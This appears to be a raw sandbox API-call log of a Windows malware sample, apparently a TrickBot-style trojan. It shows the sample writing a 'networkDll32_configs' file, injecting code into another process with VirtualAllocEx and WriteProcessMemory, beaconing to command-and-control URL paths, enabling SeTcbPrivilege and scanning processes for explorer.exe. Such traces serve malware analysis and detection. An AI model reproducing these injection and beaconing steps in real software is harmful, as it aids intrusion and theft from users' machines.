	[0217.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f18) returned 1
	[0217.156] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs")) returned 0xffffffff
	[0217.156] PathRemoveBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs") returned=""
	[0217.156] CreateDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs"), lpSecurityAttributes=0x0) returned 1
	[0217.157] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\") returned=""
	[0217.157] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560
	[0217.157] WriteFile (in: hFile=0x560, lpBuffer=0x22ba9c8*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x12853c, lpOverlapped=0x0 | out: lpBuffer=0x22ba9c8*, lpNumberOfBytesWritten=0x12853c*=0x3a0, lpOverlapped=0x0) returned 1
	[0217.158] CloseHandle (hObject=0x560) returned 1
	[0217.159] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12854c | out: lpSystemTimeAsFileTime=0x12854c*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) 
	[0217.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetConf", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
	[0217.159] lstrlenA (lpString="SetConf") returned 7
	[0217.159] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0217.159] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa68*, nSize=0x8, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x22ffa68*, lpNumberOfBytesWritten=0x12802c*=0x8) returned 1
	[0217.159] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x2eb, flAllocationType=0x3000, flProtect=0x40) returned 0x250000
	[0217.160] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x250000, lpBuffer=0x26cfba8*, nSize=0x2eb, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x26cfba8*, lpNumberOfBytesWritten=0x12802c*=0x2eb) returned 1
	[0217.160] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x260000
	[0217.160] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x260000, lpBuffer=0x1280b8*, nSize=0x400, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x1280b8*, lpNumberOfBytesWritten=0x12802c*=0x400) returned 1
	[0217.160] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x480000
	[0217.161] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x480000, lpBuffer=0x1284b8*, nSize=0x80, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x1284b8*, lpNumberOfBytesWritten=0x12802c*=0x80) returned 1
	[0217.161] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x490000
	[0217.161] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x127fac, nSize=0x70, lpNumberOfBytesRead=0x127f8c | out: lpBuffer=0x127fac*, lpNumberOfBytesRead=0x127f8c*=0x70) returned 1
	[0217.161] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f18
	[0217.161] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x4a0000
	[0217.161] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x4a0000, lpBuffer=0x22a5f18*, nSize=0x2c, lpNumberOfBytesWritten=0x127f84 | out: lpBuffer=0x22a5f18*, lpNumberOfBytesWritten=0x127f84*=0x2c) returned 1
	[0217.162] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x127fac*, nSize=0x70, lpNumberOfBytesWritten=0x127f84 | out: lpBuffer=0x127fac*, lpNumberOfBytesWritten=0x127f84*=0x70) returned 1
	[0217.162] ResetEvent (hEvent=0x548) returned 1
	[0217.162] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0218.391] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x127fac, nSize=0x70, lpNumberOfBytesRead=0x127f84 | out: lpBuffer=0x127fac*, lpNumberOfBytesRead=0x127f84*=0x70) returned 1
	[0218.393] VirtualFreeEx (hProcess=0x584, lpAddress=0x4a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.667] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f18) returned 1
	[0218.667] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x480000, lpBuffer=0x1284b8, nSize=0x80, lpNumberOfBytesRead=0x128040 | out: lpBuffer=0x1284b8*, lpNumberOfBytesRead=0x128040*=0x80) returned 1
	[0218.667] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x260000, lpBuffer=0x1280b8, nSize=0x400, lpNumberOfBytesRead=0x128040 | out: lpBuffer=0x1280b8*, lpNumberOfBytesRead=0x128040*=0x400) returned 1
	[0218.667] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x490004, lpBuffer=0x12806c, nSize=0x4, lpNumberOfBytesRead=0x128040 | out: lpBuffer=0x12806c*, lpNumberOfBytesRead=0x128040*=0x4) returned 1
	[0218.667] VirtualFreeEx (hProcess=0x584, lpAddress=0x490000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.667] VirtualFreeEx (hProcess=0x584, lpAddress=0x480000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.667] VirtualFreeEx (hProcess=0x584, lpAddress=0x250000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.668] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cfba8) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0218.668] VirtualFreeEx (hProcess=0x584, lpAddress=0xc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.668] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff510) returned 1
	[0218.668] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737b88
	[0218.668] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff510
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27330e8) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad378) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff2d0) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0218.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6e40) returned 1
	[0218.668] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6e40
	[0218.669] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0218.669] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0218.669] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/68975813/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0218.669] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128be4, dwBufferLength=0x4) returned 1
	[0218.669] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0218.935] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0218.935] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bd4, lpdwBufferLength=0x128bd0, lpdwIndex=0x0 | out: lpBuffer=0x128bd4*, lpdwBufferLength=0x128bd0*=0x4, lpdwIndex=0x0) returned 1
	[0218.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1
	[0218.935] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff2d0
	[0218.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x22ff2d0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0218.935] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0218.935] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0218.935] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/63/networkDll/start///", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0218.936] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bbc, dwBufferLength=0x4) returned 1
	[0218.936] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0219.687] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0219.687] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bac, lpdwBufferLength=0x128ba8, lpdwIndex=0x0 | out: lpBuffer=0x128bac*, lpdwBufferLength=0x128ba8*=0x4, lpdwIndex=0x0) returned 1
	[0219.687] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff2d0) returned 1
	[0219.687] GetCurrentProcess () returned 0xffffffff
	[0219.687] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1294f8 | out: TokenHandle=0x1294f8*=0x560) returned 1
	[0219.687] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x1294e8 | out: lpLuid=0x1294e8*(LowPart=0x7, HighPart=0)) returned 1
	[0219.688] AdjustTokenPrivileges (in: TokenHandle=0x560, DisableAllPrivileges=0, NewState=0x1294e4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x1294d4, ReturnLength=0x1294f4 | out: PreviousState=0x1294d4, ReturnLength=0x1294f4) returned 1
	[0219.689] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x56c
	[0219.692] Process32FirstW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0219.692] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0219.692] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0219.693] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0219.693] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0219.694] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0219.694] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0219.695] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0219.695] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0219.696] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0219.696] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0219.697] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0219.697] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0219.698] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0219.698] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0219.699] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0219.699] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0219.699] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0219.699] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0219.700] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0219.700] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.701] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.701] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.702] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.702] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.703] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.703] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.703] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.703] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.704] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.704] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.705] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.705] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.706] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.706] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0219.707] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0219.707] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.707] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.707] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0219.708] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0219.708] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0219.709] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0219.709] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.710] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.710] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0219.711] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0219.711] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0219.712] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0219.712] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0219.713] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0219.713] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0219.713] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0219.713] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0219.714] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0219.714] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0219.715] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0219.715] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0219.716] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0219.716] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0219.717] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0219.717] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0219.718] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0219.718] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0219.718] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0219.718] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0219.719] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0219.719] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0219.720] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0219.720] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0219.721] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0219.721] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0219.722] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0219.722] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0219.722] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
